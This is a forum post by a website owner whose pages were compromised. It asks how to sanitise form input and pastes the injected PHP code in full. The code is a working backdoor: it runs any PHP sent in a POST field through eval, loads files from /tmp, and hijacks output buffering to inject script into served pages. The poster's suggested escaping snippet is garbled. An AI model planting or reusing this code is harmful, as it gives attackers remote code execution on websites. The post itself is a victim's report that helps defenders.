I recently found the php code below in all of my web pages. My hosting company said someone must have used one of my scripts or forms to seize root control of my websites. They changed the permissions from me to them and even though it has been changed back to me I can’t remove this code using WebShell file mananger. I have to delete the file and upload a new copy.
Couldn’t I just use some sort of script to change the less than and greater than signs to render any php or javascript code useless. i.e.,
[code=php]$article = escape_data($_POST[‘article’]);
$article = str_replace(“<“,”<”,$article);
I know I can use htmlspecialchars but people may want to use a single or double quote in their article.
The code I found:
[code=php]<?php
if(!function_exists(‘tmp_lkojfghx’))
{
for($i=1;$i<100;$i++)
if(is_file($f=’/tmp/m’.$i))
{
include_once($f);
break;
}
if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]);
if(!defined(‘TMP_XHGFJOKL’))
define(‘TMP_XHGFJOKL’,base64_decode(”));
function tmp_lkojfghx($s)
{
if($g=(bin2hex(substr($s,0,2))==’1f8b’))$s=gzinflate(substr($s,10,-8));
if(preg_match_all(‘#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)
if(count(explode(“n”,$v))>5)
{
$e=preg_match(‘#[‘”][^s'”.,;?![]:/<>()]{30,}#’,$v)||preg_match(‘#[([](s*d+,){20,}#’,$v);
if((preg_match(‘#bevalb#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);
}
$s1=preg_replace(base64_decode(”),”,$s);
if(stristr($s,'</body’))$s=preg_replace(‘#(s*</body)#mi’,str_replace(‘$’,’\$’,TMP_XHGFJOKL).’1′,$s1);
elseif(($s1!=$s)||defined(‘PMT_knghjg’)||stristr($s,'<body’)||stristr($s,'</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;
}
function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0)
{$s=array();
if($b&&$GLOBALS[‘tmp_xhgfjokl’])
call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d);
foreach(@ob_get_status(1) as $v)
if(($a=$v[‘name’])==’tmp_lkojfghx’)return;
else $s[]=array($a==’default output handler’?false:$a);
for($i=count($s)-1;$i>=0;$i–)
{
$s[$i][1]=ob_get_contents();
ob_end_clean();
}
ob_start(‘tmp_lkojfghx’);
for($i=0;$i<count($s);$i++)
{
ob_start($s[$i][0]);echo $s[$i][1];
}
}
}
if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2’)$GLOBALS[‘tmp_xhgfjokl’]=$a;tmp_lkojfghx2();
?>